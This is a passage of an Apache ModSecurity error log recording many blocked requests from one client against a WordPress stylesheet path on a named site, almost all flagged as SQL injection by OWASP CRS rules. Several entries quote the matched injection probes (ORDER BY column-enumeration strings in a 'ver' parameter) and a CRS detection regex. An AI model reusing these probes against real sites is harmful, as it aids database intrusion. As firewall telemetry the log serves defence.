SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFn4xkekPtrPbqLNY4XAAAANg"] [Wed Jun 26 16:18:24.103489 2024] [:error] [pid 31246:tid 140055234430720] [client 141.98.81.52:34344] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFoFxchXPGtOGw21Gp9gAAAJI"] [Wed Jun 26 16:18:24.347577 2024] [:error] [pid 31859:tid 140055251216128] [client 141.98.81.52:34346] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFoIxkekPtrPbqLNY4XQAAANA"] [Wed Jun 26 16:18:24.596535 2024] [:error] [pid 31245:tid 140055449597696] [client 141.98.81.52:34348] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 4.2.16' ORDER BY 1-- pbCa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFoK57xDCgKzJ-zxAxkAAAAEE"] [Wed Jun 26 16:18:24.849917 2024] [:error] [pid 31859:tid 140055209252608] [client 141.98.81.52:34350] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFoIxkekPtrPbqLNY4XgAAANU"] [Wed Jun 26 16:18:25.102233 2024] [:error] [pid 31859:tid 140055309965056] [client 141.98.81.52:34352] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFoYxkekPtrPbqLNY4XwAAAMk"] [Wed Jun 26 16:18:25.359400 2024] [:error] [pid 31859:tid 140055441204992] [client 141.98.81.52:34354] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFoYxkekPtrPbqLNY4YAAAAMI"] [Wed Jun 26 16:18:25.607424 2024] [:error] [pid 31859:tid 140055259608832] [client 141.98.81.52:34356] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFoYxkekPtrPbqLNY4YQAAAM8"] [Wed Jun 26 16:18:25.847923 2024] [:error] [pid 31244:tid 140055407634176] [client 141.98.81.52:34358] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFoebXXCyFmkhe1iNqTgAAAAY"] [Wed Jun 26 16:18:26.093973 2024] [:error] [pid 31859:tid 140055449597696] [client 141.98.81.52:34360] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFooxkekPtrPbqLNY4YgAAAME"] [Wed Jun 26 16:18:26.338392 2024] [:error] [pid 31246:tid 140055326750464] [client 141.98.81.52:34362] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFolxchXPGtOGw21Gp9wAAAIc"] [Wed Jun 26 16:18:26.581172 2024] [:error] [pid 31246:tid 140055251216128] [client 141.98.81.52:34364] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFolxchXPGtOGw21Gp-AAAAJA"] [Wed Jun 26 16:18:26.830036 2024] [:error] [pid 31245:tid 140055432812288] [client 141.98.81.52:34366] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFoq57xDCgKzJ-zxAxkQAAAEM"] [Wed Jun 26 16:18:27.077802 2024] [:error] [pid 31245:tid 140055424419584] [client 141.98.81.52:34368] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFo657xDCgKzJ-zxAxkgAAAEQ"] [Wed Jun 26 16:18:27.316399 2024] [:error] [pid 31245:tid 140055284786944] [client 141.98.81.52:34370] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 4.2.16%' ORDER BY 1-- hsBe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFo657xDCgKzJ-zxAxkwAAAEw"] [Wed Jun 26 16:18:27.565421 2024] [:error] [pid 31245:tid 140055309965056] [client 141.98.81.52:34372] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFo657xDCgKzJ-zxAxlAAAAEk"] [Wed Jun 26 16:18:27.819123 2024] [:error] [pid 31245:tid 140055268001536] [client 141.98.81.52:34374] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFo657xDCgKzJ-zxAxlQAAAE4"] [Wed Jun 26 16:18:28.087397 2024] [:error] [pid 31245:tid 140055301572352] [client 141.98.81.52:34376] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFpK57xDCgKzJ-zxAxlgAAAEo"] [Wed Jun 26 16:18:28.344519 2024] [:error] [pid 31245:tid 140055184074496] [client 141.98.81.52:34378] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFpK57xDCgKzJ-zxAxlwAAAFg"] [Wed Jun 26 16:18:28.588096 2024] [:error] [pid 31245:tid 140055251216128] [client 141.98.81.52:34380] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFpK57xDCgKzJ-zxAxmAAAAFA"] [Wed Jun 26 16:18:28.843296 2024] [:error] [pid 31245:tid 140055217645312] [client 141.98.81.52:34382] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFpK57xDCgKzJ-zxAxmQAAAFQ"] [Wed Jun 26 16:18:29.094851 2024] [:error] [pid 31245:tid 140055259608832] [client 141.98.81.52:34384] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFpa57xDCgKzJ-zxAxmgAAAE8"] [Wed Jun 26 16:18:29.345540 2024] [:error] [pid 31859:tid 140055192467200] [client 141.98.81.52:34386] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFpYxkekPtrPbqLNY4YwAAANc"] [Wed Jun 26 16:18:29.600711 2024] [:error] [pid 31859:tid 140055416026880] [client 141.98.81.52:34388] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFpYxkekPtrPbqLNY4ZAAAAMU"] [Wed Jun 26 16:18:29.836241 2024] [:error] [pid 31859:tid 140055200859904] [client 141.98.81.52:34390] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFpYxkekPtrPbqLNY4ZQAAANY"] [Wed Jun 26 16:18:30.076908 2024] [:error] [pid 31859:tid 140055226038016] [client 141.98.81.52:34392] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 4.2.16 ORDER BY 1-- hdiQ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFpoxkekPtrPbqLNY4ZgAAANM"] [Wed Jun 26 16:18:30.326947 2024] [:error] [pid 31859:tid 140055242823424] [client 141.98.81.52:34394] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFpoxkekPtrPbqLNY4ZwAAANE"] [Wed Jun 26 16:18:30.577544 2024] [:error] [pid 31859:tid 140055457990400] [client 141.98.81.52:34396] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFpoxkekPtrPbqLNY4aAAAAMA"] [Wed Jun 26 16:18:30.825934 2024] [:error] [pid 31859:tid 140055326750464] [client 141.98.81.52:34398] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFpoxkekPtrPbqLNY4aQAAAMc"] [Wed Jun 26 16:18:31.076558 2024] [:error] [pid 31859:tid 140055268001536] [client 141.98.81.52:34400] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFp4xkekPtrPbqLNY4agAAAM4"] [Wed Jun 26 16:18:31.318732 2024] 